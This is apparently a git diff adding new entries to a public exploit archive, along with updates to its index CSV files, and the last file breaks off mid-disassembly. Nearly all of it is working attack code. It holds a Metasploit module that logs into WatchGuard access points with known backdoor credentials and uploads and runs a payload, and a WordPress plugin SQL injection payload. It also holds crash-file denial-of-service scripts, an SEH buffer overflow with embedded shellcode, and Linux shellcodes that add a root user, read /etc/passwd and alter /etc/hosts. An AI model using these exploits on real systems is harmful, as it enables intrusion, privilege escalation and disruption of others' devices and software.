diff --git a/exploits/linux/webapps/45409.rb b/exploits/linux/webapps/45409.rb
new file mode 100755
index 000000000..2a0846feb
--- /dev/null
+++ b/exploits/linux/webapps/45409.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Watchguard AP Backdoor Shell',
+ 'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
+ gain a valid web session on the HTTP administration interface. The administrator
+ can then upload a shell directly to the web root to execute it.
+ This module can also be used if you have legitimate access credentials to the device.',
+ 'References' =>
+ [
+ ['CVE', 'CVE-2018-10575'],
+ ['CVE', 'CVE-2018-10576'],
+ ['CVE', 'CVE-2018-10577'],
+ ['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
+ ['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
+ ],
+ 'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Targets' => [ [ 'Automatic', { } ] ],
+ 'DefaultTarget' => 0,
+ 'Arch' => ARCH_MIPSBE,
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ #Opt::SSL(true),
+ OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
+ OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
+ ])
+ end
+
+ def exploit
+ begin
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => '/cgi-bin/luci/',
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ })
+
+ if res.nil? || res.get_cookies.empty?
+ fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
+ end
+
+ # We have a valid session, so we should pull out the access credentials and find the serial number
+ sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
+ stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
+
+ vprint_status("Got sysauth #{sysauth}")
+ vprint_status("Got stok #{stok}")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/cgi-bin/luci/;#{stok}/html/Status",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => sysauth,
+ })
+
+ if res.nil? || res.code != 200
+ fail_with(Failure::NotFound, 'Unable to request serial')
+ end
+
+ # Pull out the serial and store it for later
+ # var device_serial = "20AP0XXXXXXXX";
+ if res.body.match(/device_serial = "(\w+)";/)
+ serial = $1
+ else
+ fail_with(Failure::NotFound, 'Unable to find serial in response')
+ end
+
+ vprint_status("Got serial #{serial}")
+
+ # Finally, upload our payloads
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
+ 'data' => payload.encoded_exe,
+ })
+
+ if res.nil? || res.code != 205
+ fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+ end
+
+ # Upload the lua script that executes our payload
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => "/cgi-bin/luci/;#{stok}/wgupload",
+ 'headers' => {
+ 'AUTH_USER' => datastore['WG_USER'],
+ 'AUTH_PASS' => datastore['WG_PASS'],
+ },
+ 'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
+ 'data' => "#!/usr/bin/lua
+os.execute('/bin/chmod +x /tmp/payload');
+os.execute('/tmp/payload');"
+ })
+
+ if res.nil? || res.code != 205
+ fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+ end
+
+ # Remove the trigger script once we've got a shell
+ register_file_for_cleanup("/www/cgi-bin/payload.luci")
+
+ vprint_status("Uploaded lua script")
+
+ # Trigger our payload
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => "/cgi-bin/payload.luci",
+ })
+
+ vprint_status("Requested lua payload")
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ vprint_error("Failed to connect to the web server")
+ return nil
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/45411.txt b/exploits/php/webapps/45411.txt
new file mode 100644
index 000000000..3179b3d3c
--- /dev/null
+++ b/exploits/php/webapps/45411.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
+# Date: 2018-09-09
+# Exploit Author: Ceylan Bozogullarindan
+# Vendor Homepage: http://modalsurvey.pantherius.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
+# Version: 1.5.7.3
+# Tested on: Windows 10
+# CVE: N\A
+
+# Description
+# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter.
+
+# PoC
+# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
+# Answer that question.
+# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager,
+# and change it with the payload showed below;
+
+["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
+
+# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result
+# of the query. When you make it 1=1, you should see a question from firt record.
+# Therefore OR statement must be returned False.
+
+# Step 3. Reload the page. Open the source code of the page. Search "sss_params".
+# You will see the version of DB in value of sss_params parameter.
+
+# The Request
+
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+# The result from source code of the page
+
+
+
+DB version: "10.1.36-MariaDB-1~trusty"....
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45410.py b/exploits/windows_x86-64/dos/45410.py
new file mode 100755
index 000000000..cbf71224d
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45410.py
@@ -0,0 +1,27 @@
+# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
+# Discovery by: Alan Baeza
+# Discovery Date: 2018-09-13
+# Vendor Homepage: https://cdburnerxp.se/
+# Software Link: https://cdburnerxp.se/downloadsetup.exe
+# Tested Version: 4.5.8.6795
+# Tested on OS : Windows 10 Pro x64 es
+
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+# Steps to Produce the DoS:
+# 1.- Run python code : python dos.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open CdBurnerXP
+# 4.- Select option "Copy or grab disc"
+# 5.- Select checkbox target "Hard disk"
+# 6.- Paste ClipBoard on "File name"
+# 7.- Clic Copy disc
+# 8.- DoS
+
+import socket, os, sys
+
+buffer = "\x41" * 260
+
+f = open ("generate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45414.py b/exploits/windows_x86-64/dos/45414.py
new file mode 100755
index 000000000..b3ba63c9a
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45414.py
@@ -0,0 +1,25 @@
+# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-14
+# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
+# Tested Version: 1.0.2
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Now click "Add Camera" and in the new
+# window paste the content of "exploit.txt" into the following fields:
+# "Camera name" & "DID number". Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45413.py b/exploits/windows_x86/dos/45413.py
new file mode 100755
index 000000000..1b60a28cf
--- /dev/null
+++ b/exploits/windows_x86/dos/45413.py
@@ -0,0 +1,26 @@
+# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
+# Date: 2018-09-14
+# Exploit Author: Gionathan "John" Reale
+# Version: version 0.53
+# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
+# Tested on: Windows 7 32bit
+
+# Steps to Reproduce:
+# Run the python exploit script, it will create a new file with the name "exploit.txt".
+# Start the program and click "Edit" > "Import... "
+# Find the file "exploit.txt" and click "Open"
+# You will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45412.py b/exploits/windows_x86/local/45412.py
new file mode 100755
index 000000000..a4b13c538
--- /dev/null
+++ b/exploits/windows_x86/local/45412.py
@@ -0,0 +1,51 @@
+# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-13
+# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+# Tested on OS: Windows 7 32bit
+# Tested Version: 2.6
+# Steps to Reproduce:
+# Run the python exploit script, it will create a new file with the name "exploit.wma".
+# Start the program and click on "Convert".
+# Find the file "exploit.wma" and click "Open"
+# You will see a calculator poped up.
+
+#!/usr/bin/python
+
+buffer = "A" * 4116
+
+NSEH = "\xeb\x06\x90\x90"
+
+SEH = "\x21\x21\xe4\x66"
+nops = "\x90" * 8
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf = ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+ f=open("exploit.wma","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 55f959f94..c2e936a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6109,6 +6109,9 @@ id,file,description,date,author,type,platform,port
45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
+45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
+45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
+45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9969,6 +9972,7 @@ id,file,description,date,author,type,platform,port
45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
+45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39975,3 +39979,5 @@ id,file,description,date,author,type,platform,port
45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
+45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
+45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index c3b877e02..dd333117d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -908,3 +908,7 @@ id,file,description,date,author,type,platform
45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
+45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/45415.c b/shellcodes/linux_x86/45415.c
new file mode 100644
index 000000000..8938d2741
--- /dev/null
+++ b/shellcodes/linux_x86/45415.c
@@ -0,0 +1,80 @@
+/*
+# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 90 nop
+ 8048061: 58 pop eax
+ 8048062: 29 db sub ebx,ebx
+ 8048064: 31 c9 xor ecx,ecx
+ 8048066: 66 b9 01 04 mov cx,0x401
+ 804806a: 51 push ecx
+ 804806b: 5f pop edi
+ 804806c: 53 push ebx
+ 804806d: 6a 06 push 0x6
+ 804806f: 58 pop eax
+ 8048070: 48 dec eax
+ 8048071: 68 2f 2f 70 61 push 0x61702f2f
+ 8048076: 68 37 13 37 13 push 0x13371337
+ 804807b: 68 73 73 77 64 push 0x64777373
+ 8048080: 68 2f 65 74 63 push 0x6374652f
+ 8048085: 5a pop edx
+ 8048086: 5e pop esi
+ 8048087: 5f pop edi
+ 8048088: 5f pop edi
+ 8048089: 56 push esi
+ 804808a: 57 push edi
+ 804808b: 52 push edx
+ 804808c: 89 e3 mov ebx,esp
+ 804808e: cd 80 int 0x80
+ 8048090: 50 push eax
+ 8048091: 5a pop edx
+ 8048092: 92 xchg edx,eax
+ 8048093: 89 c3 mov ebx,eax
+ 8048095: 6a 05 push 0x5
+ 8048097: 31 d2 xor edx,edx
+ 8048099: 87 db xchg ebx,ebx
+ 804809b: 6a 0c push 0xc
+ 804809d: 58 pop eax
+ 804809e: 5a pop edx
+ 804809f: 92 xchg edx,eax
+ 80480a0: 52 push edx
+ 80480a1: 90 nop
+ 80480a2: 68 30 3a 3a 3a push 0x3a3a3a30
+ 80480a7: 56 push esi
+ 80480a8: 5e pop esi
+ 80480a9: 68 3a 3a 30 3a push 0x3a303a3a
+ 80480ae: 68 72 30 30 74 push 0x74303072
+ 80480b3: 48 dec eax
+ 80480b4: 89 e1 mov ecx,esp
+ 80480b6: 6a 01 push 0x1
+ 80480b8: cd 80 int 0x80
+ 80480ba: 6a 04 push 0x4
+ 80480bc: 58 pop eax
+ 80480bd: 83 c0 02 add eax,0x2
+ 80480c0: cd 80 int 0x80
+ 80480c2: 31 c0 xor eax,eax
+ 80480c4: 40 inc eax
+ 80480c5: cd 80 int 0x80
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45416.c b/shellcodes/linux_x86/45416.c
new file mode 100644
index 000000000..0047d6fa6
--- /dev/null
+++ b/shellcodes/linux_x86/45416.c
@@ -0,0 +1,64 @@
+/*
+# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: eb 2b jmp 804808d
+
+08048062 :
+ 8048062: 31 c0 xor eax,eax
+ 8048064: b0 05 mov al,0x5
+ 8048066: 5b pop ebx
+ 8048067: 31 c9 xor ecx,ecx
+ 8048069: cd 80 int 0x80
+ 804806b: 89 c3 mov ebx,eax
+ 804806d: b0 03 mov al,0x3
+ 804806f: 89 e7 mov edi,esp
+ 8048071: 89 f9 mov ecx,edi
+ 8048073: 31 d2 xor edx,edx
+ 8048075: b6 10 mov dh,0x10
+ 8048077: cd 80 int 0x80
+ 8048079: 89 c2 mov edx,eax
+ 804807b: 31 c0 xor eax,eax
+ 804807d: b0 04 mov al,0x4
+ 804807f: 31 db xor ebx,ebx
+ 8048081: b3 01 mov bl,0x1
+ 8048083: cd 80 int 0x80
+ 8048085: 31 c0 xor eax,eax
+ 8048087: b0 01 mov al,0x1
+ 8048089: 31 db xor ebx,ebx
+ 804808b: cd 80 int 0x80
+
+0804808d :
+ 804808d: e8 d0 ff ff ff call 8048062
+
+08048092 :
+ 8048092: 2f das
+ 8048093: 65 gs
+ 8048094: 74 63 je 80480f9
+ 8048096: 2f das
+ 8048097: 70 61 jo 80480fa
+ 8048099: 73 73 jae 804810e
+ 804809b: 77 64 ja 8048101
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45417.c b/shellcodes/linux_x86/45417.c
new file mode 100644
index 000000000..283b842fd
--- /dev/null
+++ b/shellcodes/linux_x86/45417.c
@@ -0,0 +1,66 @@
+/*
+ # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
+ # Date: 2018-09-13
+ # Author: Ray Doyle (@doylersec)
+ # Tested on: Linux/x86
+ # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 29 c9 sub ecx,ecx
+ 8048062: 51 push ecx
+
+08048063 :
+ 8048063: 6a 05 push 0x5
+ 8048065: 58 pop eax
+ 8048066: 68 6f 73 74 73 push 0x7374736f
+ 804806b: 68 74 63 2f 68 push 0x682f6374
+ 8048070: 68 2f 2f 2f 65 push 0x652f2f2f
+ 8048075: 54 push esp
+ 8048076: 5b pop ebx
+ 8048077: 51 push ecx
+ 8048078: 41 inc ecx
+ 8048079: b5 04 mov ch,0x4
+ 804807b: cd 80 int 0x80
+ 804807d: 93 xchg ebx,eax
+ 804807e: 6a 04 push 0x4
+ 8048080: 58 pop eax
+
+08048081 :
+ 8048081: 68 2e 63 6f 6d push 0x6d6f632e
+ 8048086: 68 6f 67 6c 65 push 0x656c676f
+ 804808b: 68 31 20 67 6f push 0x6f672031
+ 8048090: 68 31 2e 31 2e push 0x2e312e31
+ 8048095: 68 31 32 37 2e push 0x2e373231
+ 804809a: 54 push esp
+ 804809b: 59 pop ecx
+ 804809c: 6a 14 push 0x14
+ 804809e: 5a pop edx
+ 804809f: cd 80 int 0x80
+
+080480a1 :
+ 80480a1: 92 xchg edx,eax
+ 80480a2: b0 06 mov al,0x6
+ 80480a4: cd 80 int 0x80
+
+080480a6 :
+ 80480a6: 31 c0 xor eax,eax
+ 80480a8: 40 inc eax
+ 80480a9: cd 80 int 0x80
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45418.c b/shellcodes/linux_x86/45418.c
new file mode 100644
index 000000000..694d60a49
--- /dev/null
+++ b/shellcodes/linux_x86/45418.c
@@ -0,0 +1,127 @@
+/*
+# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: eb 2f jmp 8048091
+
+08048062 :
+ 8048062: 5f pop edi
+ 8048063: 57 push edi
+ 8048064: 5e pop esi
+
+08048065 :
+ 8048065: 8a 07 mov al,BYTE PTR [edi]
+ 8048067: 6a 90 push 0xffffff90
+ 8048069: 5b pop ebx
+ 804806a: 3c aa cmp al,0xaa
+ 804806c: 74 0a je 8048078
+ 804806e: 30 d8 xor al,bl
+
+08048070 :
+ 8048070: 30 07 xor BYTE PTR [edi],al
+ 8048072: 47 inc edi
+ 8048073: 30 07 xor BYTE PTR [edi],al
+ 8048075: 47 inc edi
+ 8048076: eb ed jmp 8048065
+
+08048078 :
+ 8048078: 8d 3e lea edi,[esi]
+ 804807a: 31 c0 xor eax,eax
+ 804807c: 31 db xor ebx,ebx
+
+0804807e :
+ 804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
+ 8048081: 80 f3 90 xor bl,0x90
+ 8048084: 75 10 jne 8048096
+ 8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
+ 804808a: 88 1f mov BYTE PTR [edi],bl
+ 804808c: 47 inc edi
+ 804808d: 04 02 add al,0x2
+ 804808f: eb ed jmp 804807e
+
+08048091 :
+ 8048091: e8 cc ff ff ff call 8048062
+
+08048096 :
+ 8048096: b7 cc mov bh,0xcc
+ 8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
+ 804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
+ 80480a2: 75 d4 jne 8048078
+ 80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
+ 80480a9: 8d (bad)
+ 80480aa: d5 1c aad 0x1c
+ 80480ac: f7 56 73 not DWORD PTR [esi+0x73]
+ 80480af: 31 ef xor edi,ebp
+ 80480b1: cd a9 int 0xa9
+ 80480b3: 34 12 xor al,0x12
+ 80480b5: 4f dec edi
+ 80480b6: 50 push eax
+ 80480b7: 40 inc eax
+ 80480b8: 71 d0 jno 804808a
+ 80480ba: 94 xchg esp,eax
+ 80480bb: c4 (bad)
+ 80480bc: f7 d7 not edi
+ 80480be: 7f ee jg 80480ae
+ 80480c0: 62 (bad)
+ 80480c1: c3 ret
+ 80480c2: 48 dec eax
+ 80480c3: 03 d3 add edx,ebx
+ 80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
+ 80480c8: 2c 54 sub al,0x54
+ 80480ca: 0c 78 or al,0x78
+ 80480cc: 05 6a 37 58 e4 add eax,0xe458376a
+ 80480d1: 8b dc mov ebx,esp
